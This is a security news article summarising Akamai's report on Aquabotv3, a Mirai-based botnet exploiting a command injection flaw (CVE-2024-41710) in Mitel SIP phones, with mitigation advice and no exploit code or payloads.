New Aquabot Malware Actively Exploiting Mitel SIP phones injection vulnerability

Akamai’s Security Intelligence and Response Team (SIRT) has uncovered a novel variant of the Mirai-based botnet malware, dubbed Aquabotv3, actively targeting Mitel SIP phones via a critical vulnerability.

This marks the third observed iteration of Aquabot, which now showcases unique capabilities not previously seen in Mirai derivatives.

The malware exploits CVE-2024-41710, a command injection vulnerability disclosed in mid-2024, to gain unauthorized root access on affected devices.

Aquabotv3 introduces an unorthodox feature: a “report_kill” mechanism that notifies its command-and-control (C2) servers upon receiving termination signals, such as SIGTERM or SIGKILL, on infected devices.

While this addition could enhance botnet monitoring or resilience, its true purpose remains speculative.

Aquabotv3’s activity underscores an evolving strategy by threat actors to refine malware for improved operational effectiveness.

Malware Propagation

The exploited vulnerability, CVE-2024-41710, affects Mitel’s 6800, 6900, and 6900w series SIP phones, including the 6970 Conference Unit, with firmware versions up to R6.4.0.HF1.

The flaw arises from improper input sanitization, allowing attackers to inject malicious payloads via crafted HTTP POST requests.

A publicly available proof-of-concept (PoC) by researcher Kyle Burns in mid-2024 demonstrated how an attacker could manipulate device configurations during the boot process to execute arbitrary code.

In early January 2025, Akamai’s global honeypot network detected active exploitation attempts closely resembling the PoC payload.

The malware leverages these vulnerabilities to download and execute “bin.sh,” a script that retrieves Aquabot binaries compatible with multiple architectures, including x86, ARM, and MIPS.

Advanced Features and Target Expansion

Aquabotv3 retains its foundational DDoS attack capabilities while introducing sophisticated detection-avoidance techniques.

For instance, it employs process renaming and signal handling to thwart termination attempts.

It also establishes communication with multiple C2 infrastructure endpoints, ensuring robust connectivity.

Additionally, the malware exploits other vulnerabilities, including Hadoop YARN flaws (CVE-2018-17532) and other IoT device weaknesses, to broaden its footprint.

Observed payloads indicate a focus on distributing Mirai variants across various vulnerable systems.

Unusual for Mirai derivatives, Aquabotv3’s unique signal-handling and C2 reporting functions may enable attackers to monitor control disruptions or enhance malware stealth in future iterations.

However, its continuous communication with C2 servers may also expose its presence, potentially aiding defenders in mitigation efforts.

Aquabotv3 reaffirms the persistent threat posed by Mirai-based malware to IoT ecosystems, particularly devices with weak security configurations.

Its emergence highlights the pressing need for organizations to prioritize firmware updates, strengthen input sanitization, and replace legacy systems.

Simple measures, such as changing default credentials on IoT devices, can significantly reduce exposure to such attacks.

As DDoS attacks remain a lucrative cybercriminal strategy, Akamai warns that botnets like Aquabot are increasingly marketed as “DDoS-as-a-Service” on underground platforms, including Telegram.

Security teams are encouraged to monitor indicators of compromise (IOCs) and deploy proactive defenses, such as anomaly detection systems and firewall rule updates.

Akamai assures continued surveillance of this threat and regularly updates its research to inform the cybersecurity community.

Are you from SOC/DFIR Teams? – Analyse Malware Files & Links with ANY.RUN Sandox -> Try for Free